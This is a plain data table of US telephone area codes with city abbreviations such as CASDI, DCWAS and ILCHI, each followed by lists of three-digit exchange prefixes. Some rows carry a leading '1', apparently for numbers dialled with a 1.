  619 CASDI 427 428 429 435 437 440 441 442 443 444 447 448 449 450 451
  619 CASDI 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466
  619 CASDI 469 470 472 474 475 476 477 479 482 483 484 485 487 488 490
  619 CASDI 491 492 493 494 495 496 497 502 505 506 508 514 518 522 524
  619 CASDI 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539
  619 CASDI 540 541 542 543 544 545 546 547 548 549 551 552 553 554 556
  619 CASDI 557 558 559 560 561 562 563 565 566 569 570 571 573 574 575
  619 CASDI 576 578 579 580 581 582 583 584 585 586 587 588 589 592 594
  619 CASDI 604 660 661 662 668 669 670 672 673 690 691 692 693 694 695
  619 CASDI 696 697 698 699 701 702 717 980 981 987 990 991
  415 CASFA 200 221 227 231 232 233 234 235 236 237 239 241 243 244 251
  415 CASFA 252 255 257 258 259 261 263 264 266 267 268 269 271 272 273
  415 CASFA 274 279 282 285 287 289 291 292 296 298 302 330 331 332 333
  415 CASFA 334 337 338 339 340 341 342 343 344 345 346 347 348 349 355
  415 CASFA 358 359 362 371 374 375 377 378 381 383 385 386 387 388 389
  415 CASFA 391 392 393 394 395 396 397 398 399 420 421 428 431 433 434
  415 CASFA 435 436 437 441 442 444 445 446 448 451 452 453 454 456 457
  415 CASFA 459 461 464 465 466 467 468 469 472 474 476 477 478 479 482
  415 CASFA 485 488 491 492 495 499 502 521 522 523 530 531 532 533 534
  415 CASFA 535 536 539 541 542 543 544 545 546 547 550 552 553 554 556
  415 CASFA 557 558 561 563 564 565 566 567 570 571 572 573 574 576 578
  415 CASFA 579 583 584 585 586 587 588 589 596 597 620 621 622 624 626
  415 CASFA 627 641 645 647 648 652 653 654 655 658 660 661 664 665 666
  415 CASFA 668 673 677 681 692 695 696 697 721 722 731 737 738 739 742
  415 CASFA 748 749 750 751 752 753 755 756 759 761 762 763 764 765 768
  415 CASFA 769 771 772 773 774 775 776 777 781 788 789 821 822 824 826
  415 CASFA 832 834 835 836 839 840 860 861 863 864 865 869 871 872 873
  415 CASFA 874 875 876 877 878 882 885 891 893 894 896 921 922 923 924
  415 CASFA 925 927 928 929 931 936 951 952 953 954 955 956 957 970 971
  415 CASFA 972 973 974 978 979 981 982 983 984 985 986 987 989 990 991
  415 CASFA 992 993 994 995 996 997 998 999
  408 CASJO 221 223 224 225 226 227 234 235 236 237 238 241 243 244 245
  408 CASJO 246 247 248 249 251 252 253 255 256 257 258 259 262 263 264
  408 CASJO 265 266 267 268 269 270 272 274 275 276 277 279 280 281 282
  408 CASJO 283 284 285 286 287 288 289 291 292 293 294 295 296 297 298
  408 CASJO 299 332 345 353 354 356 358 365 370 371 374 376 377 378 379
  408 CASJO 395 398 399 432 433 434 435 436 437 441 446 447 448 452 453
  408 CASJO 463 473 491 492 496 499 522 524 534 552 553 554 559 562 575
  408 CASJO 578 629 720 721 723 725 727 729 730 732 733 734 735 736 737
  408 CASJO 738 739 741 742 743 744 745 746 747 748 749 752 756 765 773
  408 CASJO 864 865 866 867 879 920 922 923 924 925 926 927 929 942 943
  408 CASJO 945 946 947 954 957 970 971 972 973 974 977 978 980 982 983
  408 CASJO 984 985 986 987 988 989 991 992 993 994 995 996 997 998
1 415 CASJO 226 335 336 438 490 498 623 651 656 657 659 683 691 694 77
1 415 CASJO 940 941 948 949 960 961 962 964 965 966 967 968 969
  303 CODEN 200 220 230 231 232 233 234 235 236 237 238 239 252 255 261
  303 CODEN 266 270 271 273 277 278 279 280 281 286 287 288 289 290 291
  303 CODEN 292 293 294 295 296 297 298 299 320 321 322 329 331 333 337
  303 CODEN 340 341 343 344 348 355 360 361 363 364 366 367 368 369 370
  303 CODEN 371 372 373 375 377 388 393 394 397 398 399 420 421 422 423
  303 CODEN 424 425 426 427 428 429 430 431 433 440 441 442 443 444 447
  303 CODEN 449 450 451 452 455 457 458 460 461 465 466 467 469 470 477
  303 CODEN 478 480 492 494 497 499 526 530 534 538 556 571 572 573 575
  303 CODEN 581 592 595 620 623 624 628 629 631 639 640 642 643 649 650
  303 CODEN 654 657 659 660 665 666 670 671 673 674 676 680 681 688 689
  303 CODEN 690 691 692 693 694 695 696 697 698 699 720 721 722 727 730
  303 CODEN 733 739 740 741 743 744 745 750 751 752 753 755 756 757 758
  303 CODEN 759 760 761 762 763 764 766 770 771 773 777 778 779 780 781
  303 CODEN 782 786 787 788 789 790 791 792 793 794 795 796 797 798 799
  303 CODEN 820 821 825 826 829 830 831 832 836 837 839 840 841 843 844
  303 CODEN 850 851 855 860 861 863 866 868 869 871 877 880 888 889 890
  303 CODEN 891 892 893 894 896 898 899 922 924 930 932 933 934 935 936
  303 CODEN 937 938 939 940 964 965 966 969 971 972 973 977 978 979 980
  303 CODEN 985 986 987 988 989
  203 CTHAR 223 224 225 229 231 232 233 236 240 241 242 243 244 246 247
  203 CTHAR 249 252 257 258 273 275 277 278 279 280 282 285 286 289 291
  203 CTHAR 292 293 296 297 298 299 520 521 522 523 524 525 527 528 529
  203 CTHAR 547 548 549 557 559 560 561 563 565 566 568 569 623 627 633
  203 CTHAR 643 644 645 646 647 648 649 651 653 654 657 658 659 660 665
  203 CTHAR 666 667 668 673 674 675 676 677 678 679 683 688 693 721 722
  203 CTHAR 724 725 726 727 728 826 827 828 829 841 843 870 871 872 875
  203 CTHAR 930 936 951 952 953 954
  202 DCWAS 200 204 206 207 208 209 210 213 214 217 218 220 222 223 224
  202 DCWAS 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239
  202 DCWAS 240 241 242 243 244 245 246 247 248 249 250 251 252 254 255
  202 DCWAS 256 258 259 260 262 263 264 265 266 267 268 269 270 271 272
  202 DCWAS 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287
  202 DCWAS 288 289 291 292 293 294 295 296 297 298 299 306 307 309 310
  202 DCWAS 317 319 320 321 322 323 324 325 326 328 329 330 331 332 333
  202 DCWAS 334 336 337 338 339 340 341 342 343 344 345 346 347 348 350
  202 DCWAS 351 352 353 354 355 356 357 358 359 360 362 363 364 365 366
  202 DCWAS 369 370 371 372 373 374 376 377 378 379 380 382 383 384 385
  202 DCWAS 386 387 388 389 390 391 392 393 394 395 396 397 398 399 401
  202 DCWAS 402 403 404 406 407 408 409 415 416 417 418 420 421 422 423
  202 DCWAS 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438
  202 DCWAS 439 440 441 442 443 444 445 447 448 449 450 451 452 453 454
  202 DCWAS 455 456 457 458 459 460 461 462 463 464 466 467 468 469 470
  202 DCWAS 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485
  202 DCWAS 486 487 488 490 492 493 495 496 497 498 499 501 502 503 504
  202 DCWAS 505 506 507 509 513 514 516 517 519 520 521 522 523 524 525
  202 DCWAS 526 527 528 529 530 532 533 534 535 536 537 538 539 540 541
  202 DCWAS 542 543 544 545 546 547 548 549 550 551 552 553 554 556 557
  202 DCWAS 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572
  202 DCWAS 573 574 575 576 577 578 580 581 582 583 584 585 586 587 588
  202 DCWAS 589 590 591 592 593 595 597 598 599 601 602 603 604 605 606
  202 DCWAS 608 610 613 618 619 620 622 623 624 625 626 627 628 630 631
  202 DCWAS 632 633 634 635 636 637 638 639 640 641 642 643 644 646 647
  202 DCWAS 648 649 650 651 652 653 654 656 657 658 659 660 661 662 663
  202 DCWAS 664 665 666 667 668 669 670 671 673 675 676 678 679 680 681
  202 DCWAS 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696
  202 DCWAS 697 698 699 702 706 707 708 709 712 713 714 715 719 722 723
  202 DCWAS 724 725 726 727 728 731 732 733 734 735 736 737 738 739 742
  202 DCWAS 745 746 749 750 751 752 753 755 756 758 759 760 761 762 763
  202 DCWAS 764 765 767 768 769 770 772 773 774 775 776 778 779 780 781
  202 DCWAS 783 784 785 786 787 789 790 794 795 797 799 801 802 803 805
  202 DCWAS 806 807 808 812 815 816 817 818 820 821 822 823 824 825 826
  202 DCWAS 827 828 829 830 832 833 834 835 836 837 838 839 840 841 842
  202 DCWAS 843 844 845 846 847 848 849 850 851 852 853 856 857 860 861
  202 DCWAS 862 863 864 865 866 868 869 870 871 872 874 875 876 877 879
  202 DCWAS 881 882 883 885 887 888 889 890 891 892 893 894 895 896 897
  202 DCWAS 898 899 901 904 906 907 912 913 914 916 917 920 921 922 924
  202 DCWAS 925 926 927 928 929 930 931 933 934 935 936 937 938 939 940
  202 DCWAS 941 942 943 944 946 947 948 949 951 952 953 954 955 956 957
  202 DCWAS 960 961 962 963 965 966 967 968 971 972 974 975 977 978 979
  202 DCWAS 980 981 982 983 984 985 986 989 990 991 994 996 998
1 301 DCWAS 206 209 210 217 220 227 229 230 231 236 238 240 248 249 251
1 301 DCWAS 258 262 270 277 279 283 286 292 294 295 297 299 306 309 317
1 301 DCWAS 320 322 330 336 340 341 344 345 350 353 365 369 372 380 384
1 301 DCWAS 386 390 394 402 403 409 417 420 421 422 423 424 427 428 431
1 301 DCWAS 434 436 439 441 443 445 449 454 459 460 464 468 469 470 474
1 301 DCWAS 480 490 492 493 495 496 497 498 499 502 505 507 509 513 520
1 301 DCWAS 530 540 552 559 564 565 567 568 570 571 572 577 580 585 587
1 301 DCWAS 588 589 590 593 595 598 599 601 604 608 618 622 627 630 640
1 301 DCWAS 649 650 652 654 656 657 670 680 681 688 699 702 713 725 731
1 301 DCWAS 735 736 738 753 762 763 770 772 773 774 776 779 794 805 807
1 301 DCWAS 808 816 839 840 843 851 852 853 856 864 868 869 870 871 881
1 301 DCWAS 888 890 891 894 897 899 907 913 916 921 924 925 926 927 929
1 301 DCWAS 930 933 935 937 940 942 946 948 949 951 952 953 961 963 967
1 301 DCWAS 972 975 977 980 981 982 983 984 985 986 989 990
1 703 DCWAS 204 207 214 218 222 235 237 239 241 242 243 246 247 250 255
1 703 DCWAS 256 260 263 264 266 271 273 274 276 278 280 281 284 285 321
1 703 DCWAS 323 325 329 339 351 352 354 355 356 358 359 360 370 378 379
1 703 DCWAS 385 391 406 407 415 418 425 430 435 437 438 440 442 444 448
1 703 DCWAS 450 451 455 461 471 476 478 481 482 486 487 503 506 516 517
1 703 DCWAS 519 521 522 524 525 527 528 532 533 534 536 538 548 549 550
1 703 DCWAS 551 553 556 557 558 560 569 573 578 591 602 603 620 631 641
1 703 DCWAS 642 643 644 648 658 660 661 664 671 683 684 685 689 690 691
1 703 DCWAS 698 706 709 712 715 719 733 734 739 742 746 749 750 751 756
1 703 DCWAS 758 759 760 761 764 765 768 769 780 781 787 790 795 799 802
1 703 DCWAS 803 815 817 818 820 821 823 824 826 827 830 834 836 838 841
1 703 DCWAS 845 846 847 848 849 850 860 866 874 875 876 883 892 893 904
1 703 DCWAS 912 914 920 922 931 934 938 941 960 968 971 974 978 979 998
  305 FLMIA 220 221 222 223 224 226 227 230 232 233 235 238 242 245 246
  305 FLMIA 247 248 250 251 252 253 254 255 257 258 261 262 263 264 266
  305 FLMIA 267 268 270 271 274 279 284 285 324 325 326 327 329 332 342
  305 FLMIA 343 347 348 349 350 352 353 354 358 361 362 363 364 365 366
  305 FLMIA 371 372 373 374 375 376 377 378 379 380 381 382 385 386 387
  305 FLMIA 388 397 399 441 442 443 444 445 446 447 448 449 460 464 470
  305 FLMIA 471 477 478 520 526 529 530 531 532 534 535 536 538 539 541
  305 FLMIA 542 543 544 545 547 548 549 550 551 552 553 554 556 557 558
  305 FLMIA 559 560 567 571 573 575 576 577 578 579 590 591 592 593 594
  305 FLMIA 595 596 598 599 620 621 623 624 625 628 633 634 635 636 637
  305 FLMIA 638 642 643 644 649 651 652 653 654 661 662 663 665 666 667
  305 FLMIA 669 670 672 673 674 681 685 687 688 691 693 694 696 751 754
  305 FLMIA 756 757 758 759 762 769 770 773 775 780 787 789 794 795 821
  305 FLMIA 822 823 825 827 829 835 836 854 855 856 858 859 861 864 865
  305 FLMIA 866 867 868 871 873 874 876 880 881 882 883 884 885 886 887
  305 FLMIA 888 889 891 892 893 895 899 931 932 933 935 937 939 940 944
  305 FLMIA 945 947 948 949 951 952 953 956 957 993 995
  407 FLORL 222 228 236 237 238 239 240 244 246 247 249 256 257 260 262
  407 FLORL 263 273 275 277 281 282 290 291 292 293 294 295 297 298 299
  407 FLORL 327 331 332 339 341 342 345 351 352 354 356 363 365 366 380
  407 FLORL 381 382 420 422 423 424 425 438 469 539 560 568 578 579 623
  407 FLORL 628 629 644 645 646 647 648 649 651 656 657 658 660 661 671
  407 FLORL 672 675 677 678 679 682 695 696 699 740 767 774 788 823 824
  407 FLORL 825 826 827 828 830 831 834 836 839 841 843 849 850 851 855
  407 FLORL 856 857 859 862 869 872 875 876 877 880 884 886 889 894 895
  407 FLORL 896 897 898 899 934 939
  813 FLTAM 221 222 223 224 225 226 227 228 229 231 232 234 236 237 238
  813 FLTAM 239 240 241 242 247 248 251 253 254 258 259 264 265 272 273
  813 FLTAM 276 281 286 287 289 620 621 622 623 626 628 633 634 641 645
  813 FLTAM 653 654 661 662 664 671 677 681 684 685 689 690 830 831 832
  813 FLTAM 835 837 839 840 854 855 870 871 872 873 874 875 876 877 878
  813 FLTAM 879 880 881 882 883 884 885 886 887 888 889 920 931 932 933
  813 FLTAM 935 948 949 960 961 962 963 968 969 971 972 973 974 977 978
  813 FLTAM 979 980 985 986 987 988 989 990 996
  404 GAATL 200 212 215 220 221 222 223 225 230 231 233 237 238 239 240
  404 GAATL 241 242 243 244 246 247 248 249 250 252 255 256 257 260 261
  404 GAATL 262 263 264 266 270 271 279 280 281 284 286 288 289 292 294
  404 GAATL 296 297 299 310 312 313 314 315 316 319 320 321 325 329 330
  404 GAATL 331 332 333 339 341 343 344 346 347 348 349 350 351 352 355
  404 GAATL 360 361 362 363 364 365 366 368 370 371 372 373 377 378 380
  404 GAATL 381 383 388 389 390 391 392 393 394 395 396 399 413 416 417
  404 GAATL 420 421 422 423 424 425 426 427 428 429 431 432 433 434 435
  404 GAATL 436 438 439 441 442 443 445 446 447 448 449 451 452 454 455
  404 GAATL 457 458 460 461 463 466 469 471 473 474 475 476 477 478 482
  404 GAATL 483 484 487 488 489 491 493 494 496 497 498 499 505 508 512
  404 GAATL 513 515 520 521 522 523 524 525 526 527 528 529 530 533 550
  404 GAATL 551 552 558 559 564 565 566 570 572 573 577 578 580 581 584
  404 GAATL 586 587 588 589 590 591 593 594 603 607 610 618 619 621 622
  404 GAATL 623 624 626 627 631 633 634 636 639 640 641 642 651 653 656
  404 GAATL 658 659 661 662 664 668 669 671 676 679 680 681 683 686 688
  404 GAATL 690 691 696 697 698 699 712 717 723 726 727 728 729 730 732
  404 GAATL 739 740 741 744 750 751 752 753 755 756 758 760 761 762 763
  404 GAATL 765 766 767 768 772 774 785 792 794 799 804 808 810 815 822
  404 GAATL 827 833 835 837 839 840 841 842 843 847 848 850 851 852 853
  404 GAATL 859 870 871 872 873 874 875 876 877 879 880 881 885 888 890
  404 GAATL 892 894 897 898 899 907 916 920 921 922 923 924 925 926 928
  404 GAATL 929 932 933 934 936 938 939 941 942 943 944 945 946 948 949
  404 GAATL 951 952 953 954 955 956 957 960 961 962 963 964 968 969 971
  404 GAATL 972 973 974 975 977 978 979 980 981 982 984 985 986 987 988
  404 GAATL 991 992 993 994 995 996 997 998 999
  312 ILCHI 202 204 207 214 220 221 222 224 225 226 227 229 230 233 235
  312 ILCHI 236 237 238 239 241 242 243 245 247 248 252 254 261 262 263
  312 ILCHI 264 265 266 267 268 269 271 273 274 275 276 277 278 280 281
  312 ILCHI 282 283 284 285 286 287 288 292 294 302 306 308 313 321 322
  312 ILCHI 324 326 327 329 332 334 337 338 341 342 346 347 348 353 363
  312 ILCHI 368 372 373 374 375 376 378 379 380 384 404 407 408 410 413
  312 ILCHI 413 415 417 419 421 427 431 434 435 436 440 443 444 445 454
  312 ILCHI 461 463 465 467 468 471 472 476 477 478 483 486 487 488 489
  312 ILCHI 493 507 508 509 514 521 522 523 525 527 528 533 536 538 539
  312 ILCHI 542 545 548 549 558 559 561 565 567 568 569 580 581 582 583
  312 ILCHI 585 586 588 589 591 592 601 602 604 606 609 621 622 624 625
  312 ILCHI 626 630 631 633 637 638 641 642 643 644 645 646 648 649 650
  312 ILCHI 651 660 661 663 664 666 667 670 684 685 686 693 694 701 702
  312 ILCHI 703 704 707 712 715 716 718 721 722 723 725 726 727 728 731
  312 ILCHI 732 733 734 735 736 737 738 743 744 745 750 751 752 753 760
  312 ILCHI 761 762 763 764 765 767 768 769 770 772 774 775 776 777 778
  312 ILCHI 779 781 782 783 784 785 786 787 791 792 793 794 796 797 802
  312 ILCHI 804 805 807 808 812 814 819 821 822 826 828 829 836 838 842
  312 ILCHI 845 846 847 853 854 855 856 861 871 873 874 875 876 878 880
  312 ILCHI 881 883 886 889 890 899 901 902 903 906 907 908 909 915 917
  312 ILCHI 918 921 922 923 924 925 927 928 929 930 933 935 936 938 939
  312 ILCHI 942 943 944 947 951 955 962 973 975 977 978 984 987 988 989
  312 ILCHI 992 993 994 995 996 997
1 708 ILCHI 200 201 203 205 206 208 209 210 213 215 216 218 223 228 231
1 708 ILCHI 232 234 240 244 246 249 250 251 253 255 256 257 258 259 260
1 708 ILCHI 272 279 289 290 291 293 295 296 297 298 299 301 303 304 307
1 708 ILCHI 310 314 315 316 317 318 319 323 325 328 330 331 333 335 336
1 708 ILCHI 339 343 344 345 349 350 351 352 354 355 357 358 359 360 361
1 708 ILCHI 362 364 366 367 369 371 377 381 382 383 385 386 387 388 389
1 708 ILCHI 390 391 392 393 394 396 397 398 401 402 403 405 406 409 412
1 708 ILCHI 416 418 420 422 423 424 425 426 428 429 430 432 433 437 438
1 708 ILCHI 439 441 442 446 447 448 449 450 451 452 453 455 456 457 458
1 708 ILCHI 459 460 462 469 470 473 474 475 479 480 481 482 484 485 490
1 708 ILCHI 491 492 495 496 498 499 501 502 503 504 505 506 510 512 513
1 708 ILCHI 515 516 517 518 519 520 524 526 529 530 531 532 534 535 537
1 708 ILCHI 540 541 543 544 547 550 551 560 562 563 564 566 570 571 572
1 708 ILCHI 573 574 575 576 577 578 579 584 590 593 594 595 596 597 598
1 708 ILCHI 599 603 605 607 608 612 613 614 615 617 618 619 620 623 627
1 708 ILCHI 628 629 632 634 635 636 639 640 647 652 653 654 655 656 657
1 708 ILCHI 658 659 662 665 668 671 672 673 674 675 676 677 678 679 680
1 708 ILCHI 681 682 687 688 689 690 691 692 695 696 697 698 699 705 706
1 708 ILCHI 709 713 714 717 719 720 724 729 730 739 741 742 746 747 748
1 708 ILCHI 749 754 755 756 757 758 759 766 771 773 780 788 789 790 795
1 708 ILCHI 798 799 801 803 806 810 816 817 818 820 823 824 825 827 830
1 708 ILCHI 831 832 833 834 835 837 839 840 841 843 844 848 849 850 851
1 708 ILCHI 852 857 858 859 860 862 863 864 865 866 867 868 869 870 872
1 708 ILCHI 877 879 882 884 885 887 888 891 892 893 894 895 896 897 898
1 708 ILCHI 904 905 910 913 914 916 919 920 926 931 932 934 937 940 941
1 708 ILCHI 945 946 948 949 952 953 954 956 957 960 961 963 964 965 966
1 708 ILCHI 967 968 969 971 972 974 979 980 981 982 983 985 986 990 991
1 708 ILCHI 998
1 815 ILCHI 254 372 423 424 436 439 469 474 478 485 722 723 725 726 727
1 815 ILCHI 729 740 741 744 773 774 834 838 886
  317 ININD 200 222 226 228 230 231 232 233 235 236 237 238 239 240 241
  317 ININD 242 243 244 247 248 251 252 253 254 255 256 257 259 261 262
  317 ININD 263 264 265 266 267 269 271 272 273 274 276 277 278 283 290
  317 ININD 291 293 297 298 299 321 322 326 328 335 351 352 353 355 356
  317 ININD 357 359 422 424 425 431 432 439 441 442 443 445 461 462 464
  317 ININD 465 466 467 469 470 471 485 486 488 535 539 541 542 543 545
  317 ININD 546 547 549 556 571 573 574 575 576 577 578 579 580 630 631
  317 ININD 632 633 634 635 636 637 638 639 681 684 685 686 687 691 694
  317 ININD 736 738 745 769 773 776 780 781 782 783 784 786 787 788 823
  317 ININD 831 835 838 839 841 842 843 844 845 846 848 849 852 856 861
  317 ININD 862 867 870 871 872 873 875 876 877 878 879 881 882 885 887
  317 ININD 888 889 891 892 894 895 896 897 898 899 920 921 923 924 925
  317 ININD 926 927 928 929 976 994 996
  504 LANOR 241 242 243 244 245 246 253 254 255 257 260 271 277 278 279
  504 LANOR 282 283 286 288 340 341 347 348 349 361 362 363 364 366 367
  504 LANOR 368 391 392 393 394 398 431 436 441 443 450 451 454 455 456
  504 LANOR 461 462 464 465 466 467 468 469 482 483 484 486 488 521 522
  504 LANOR 523 524 525 527 528 529 552 561 565 566 568 569 581 582 583
  504 LANOR 584 585 586 587 588 589 592 593 595 596 597 656 662 671 676
  504 LANOR 682 684 689 731 733 734 736 737 738 739 762 821 822 824 826
  504 LANOR 827 830 831 832 833 834 835 836 837 838 861 862 865 866 883
  504 LANOR 884 885 887 888 889 891 895 896 897 899 941 942 943 944 945
  504 LANOR 947 948 949 976
  617 MABOS 200 223 224 225 226 227 230 231 232 233 234 235 236 237 239
  617 MABOS 241 242 243 244 245 246 247 248 252 253 254 257 258 261 262
  617 MABOS 263 264 265 266 267 268 269 271 274 275 276 277 278 279 280
  617 MABOS 282 284 285 286 287 288 289 290 292 296 298 320 321 322 323
  617 MABOS 324 325 326 327 328 329 330 331 332 333 335 337 338 340 343
  617 MABOS 345 348 349 350 353 354 357 361 362 364 367 375 377 380 381
  617 MABOS 382 387 389 391 393 394 395 396 397 421 423 424 426 427 428
  617 MABOS 429 431 432 434 436 437 438 439 442 444 445 446 449 450 451
  617 MABOS 455 456 457 461 463 464 466 469 471 472 473 479 482 483 484
  617 MABOS 486 487 488 489 491 492 493 494 495 496 497 498 499 522 523
  617 MABOS 524 527 532 534 536 538 539 541 542 546 547 552 553 556 558
  617 MABOS 560 561 562 565 566 567 568 569 570 571 572 573 574 576 577
  617 MABOS 578 579 581 586 589 592 593 594 595 596 598 599 621 622 623
  617 MABOS 625 628 629 630 633 635 637 638 641 642 643 646 647 648 654
  617 MABOS 661 662 665 666 669 674 680 684 693 694 695 696 698 720 721
  617 MABOS 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736
  617 MABOS 737 738 739 740 742 743 748 749 756 770 773 774 776 781 782
  617 MABOS 783 786 787 789 825 841 842 843 845 846 847 848 849 855 859
  617 MABOS 860 861 862 863 864 868 873 876 884 887 889 890 891 893 894
  617 MABOS 895 899 923 924 925 926 929 930 931 932 933 935 936 937 938
  617 MABOS 942 944 945 951 954 955 956 958 962 964 965 966 969 972 973
  617 MABOS 974 979 981 983 984 985
  313 MIAAR 420 426 428 429 434 437 439 449 451 453 454 455 459 475 481
  313 MIAAR 482 483 484 485 486 487 495 572 662 663 665 668 677 747 761
  313 MIAAR 763 764 769 930 936 971 973 981 994 995 996 998
  313 MIDET 222 223 224 225 226 237 240 245 252 255 256 259 267 270 271
  313 MIDET 272 273 274 275 276 277 278 291 292 295 297 298 320 321 322
  313 MIDET 323 328 330 331 336 337 341 342 343 345 361 365 366 368 369
  313 MIDET 371 372 381 382 383 386 388 389 390 393 396 430 431 436 438
  313 MIDET 440 441 444 446 448 460 491 493 494 496 499 520 521 526 527
  313 MIDET 531 532 533 534 535 536 537 538 554 556 560 561 562 563 564
  313 MIDET 565 567 568 571 577 579 581 582 584 592 593 594 596 599 630
  313 MIDET 690 745 770 780 821 822 823 824 829 831 832 833 834 835 836
  313 MIDET 837 838 839 841 842 843 845 846 849 861 862 863 864 865 866
  313 MIDET 867 868 869 871 872 873 874 875 876 881 882 883 884 885 886
  313 MIDET 891 892 893 894 895 896 897 898 899 921 922 923 924 925 926
  313 MIDET 927 928 929 931 933 934 935 937 940 943 945 956 961 962 963
  313 MIDET 964 965 966 972 974 976 980 983 993
  612 MNMIN 220 221 222 223 224 227 228 229 290 291 292 293 296 297 298
  612 MNMIN 323 330 331 332 333 334 335 336 337 338 339 340 341 342 343
  612 MNMIN 344 347 348 349 368 370 371 372 373 374 375 376 377 378 379
  612 MNMIN 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434
  612 MNMIN 435 436 437 438 439 440 441 443 444 445 446 447 448 449 450
  612 MNMIN 451 452 454 455 456 457 458 459 460 461 462 463 464 469 470
  612 MNMIN 471 472 473 474 475 476 477 478 479 481 482 483 484 487 488
  612 MNMIN 489 490 491 492 493 494 496 497 498 499 520 521 522 526 527
  612 MNMIN 529 533 534 535 536 537 538 540 541 542 544 545 546 552 553
  612 MNMIN 557 559 560 561 566 569 571 572 574 588 591 593 620 621 622
  612 MNMIN 623 624 625 626 627 631 633 635 636 638 639 640 641 642 643
  612 MNMIN 644 645 646 647 648 649 653 663 667 673 681 683 687 688 690
  612 MNMIN 696 698 699 720 721 722 723 724 725 726 727 728 729 730 731
  612 MNMIN 733 735 736 737 738 739 741 750 753 754 755 757 770 771 772
  612 MNMIN 774 776 777 778 779 780 781 782 784 785 786 788 789 822 823
  612 MNMIN 824 825 827 828 829 830 831 832 835 851 853 854 858 861 863
  612 MNMIN 865 866 867 868 869 870 871 872 874 879 881 884 885 887 888
  612 MNMIN 890 891 892 893 894 895 896 897 920 921 922 924 925 926 927
  612 MNMIN 929 931 932 933 934 935 936 937 938 939 941 942 944 949 976
  612 MNMIN 977 989
  816 MOKCI 221 223 224 225 228 229 231 234 241 242 243 245 246 247 251
  816 MOKCI 252 254 257 274 275 276 283 292 322 331 333 346 348 353 356
  816 MOKCI 358 361 363 373 374 391 395 421 426 435 436 444 452 453 454
  816 MOKCI 455 459 461 464 466 468 471 472 474 478 483 497 521 523 524
  816 MOKCI 525 531 532 537 556 561 572 576 578 587 589 591 654 698 734
  816 MOKCI 737 741 743 751 753 756 757 759 761 763 765 767 781 792 795
  816 MOKCI 796 821 822 833 836 842 844 854 861 871 881 891 921 922 923
  816 MOKCI 924 926 931 932 941 942 943 966 968 995 997
1 913 MOKCI 236 262 268 281 287 299 321 334 339 341 342 345 362 371 375
1 913 MOKCI 381 383 384 422 432 441 451 469 491 492 541 551 573 574 576
1 913 MOKCI 588 596 599 621 631 642 648 649 661 676 677 681 721 722 724
1 913 MOKCI 764 780 782 787 788 791 829 831 888 894 897 962 967
  314 MOSLO 225 227 231 232 233 234 235 241 247 253 259 261 263 268 275
  314 MOSLO 277 289 291 296 298 321 331 342 343 344 349 351 352 353 355
  314 MOSLO 361 362 367 371 381 382 383 385 388 389 391 394 421 423 424
  314 MOSLO 425 426 427 428 429 432 434 436 441 444 454 458 464 466 469
  314 MOSLO 476 481 487 489 521 522 523 524 525 529 531 532 533 534 535
  314 MOSLO 538 539 541 542 544 551 553 554 567 569 571 572 576 577 578
  314 MOSLO 595 621 622 623 631 638 644 645 647 652 653 658 664 671 677
  314 MOSLO 679 694 721 725 726 727 731 739 741 746 747 752 755 758 768
  314 MOSLO 771 772 773 776 777 781 791 795 821 822 823 826 829 831 832
  314 MOSLO 836 837 838 839 841 842 843 845 846 848 849 851 854 855 862
  314 MOSLO 863 865 867 868 869 871 872 878 879 889 891 892 894 895 899
  314 MOSLO 921 928 938 939 941 942 946 947 949 957 961 962 963 965 966
  314 MOSLO 968 969 973 982 984 991 992 993 994 997
1 618 MOSLO 271 274 337 451 452 482 583 797
  919 NCRTP 248 254 266 269 280 286 361 362 365 382 383 387 460 467 469
  919 NCRTP 470 471 477 479 481 489 490 493 528 530 541 543 544 546 549
  919 NCRTP 560 575 596 598 620 660 662 664 677 681 682 683 684 687 688
  919 NCRTP 733 737 740 755 772 779 781 782 783 787 790 821 828 829 831
  919 NCRTP 832 833 834 836 839 840 846 847 848 850 851 856 859 860 870
  919 NCRTP 872 876 878 880 881 890 899 929 932 933 941 942 956 962 966
  919 NCRTP 967 968 976 990 991 992
  908 NJNBR 202 205 214 218 220 225 231 238 246 247 248 249 251 254 257
  908 NJNBR 271 274 283 287 297 302 306 321 324 329 356 360 390 406 407
  908 NJNBR 412 417 418 422 424 442 457 463 469 494 510 519 524 525 526
  908 NJNBR 545 548 549 560 561 562 563 572 602 603 607 613 632 634 636
  908 NJNBR 658 668 679 685 699 704 707 715 721 722 723 725 727 738 745
  908 NJNBR 750 752 753 754 755 756 757 769 805 819 821 826 828 844 846
  908 NJNBR 855 873 878 880 883 885 906 932 937 954 968 980 981 985
  201 NJNEW 200 207 216 217 224 226 227 228 232 233 235 239 241 242 245
  201 NJNEW 256 259 266 268 272 273 276 277 278 279 284 288 289 298 301
  201 NJNEW 304 305 309 312 313 314 315 317 318 319 322 325 330 332 333
  201 NJNEW 338 339 340 342 343 344 345 346 348 351 352 353 354 355 365
  201 NJNEW 368 371 372 373 374 375 376 377 378 379 381 382 386 388 392
  201 NJNEW 393 394 396 399 401 403 408 413 414 416 419 420 421 423 427
  201 NJNEW 428 429 430 432 433 434 435 436 437 438 440 441 450 451 456
  201 NJNEW 460 461 464 465 467 468 470 471 472 473 474 478 480 481 482
  201 NJNEW 483 484 485 486 487 488 489 499 503 504 507 509 514 515 516
  201 NJNEW 522 523 527 533 535 541 546 547 558 564 565 567 568 569 570
  201 NJNEW 574 575 578 581 582 585 587 589 592 593 594 595 596 601 602
  201 NJNEW 608 614 617 621 622 623 624 626 628 633 634 635 636 641 642
  201 NJNEW 643 645 646 648 649 653 654 656 659 661 662 665 667 669 672
  201 NJNEW 673 674 675 676 677 678 680 684 686 687 688 690 692 694 695
  201 NJNEW 696 701 703 705 708 709 712 714 716 731 733 736 737 740 742
  201 NJNEW 743 744 746 748 750 751 759 760 761 762 763 765 771 772 773
  201 NJNEW 777 778 779 783 785 789 790 791 792 794 795 796 797 798 801
  201 NJNEW 802 803 804 807 808 812 814 815 816 817 820 822 823 824 833
  201 NJNEW 836 837 843 845 851 854 855 857 858 860 861 862 863 864 865
  201 NJNEW 866 867 868 869 871 877 881 882 884 886 887 889 890 893 894
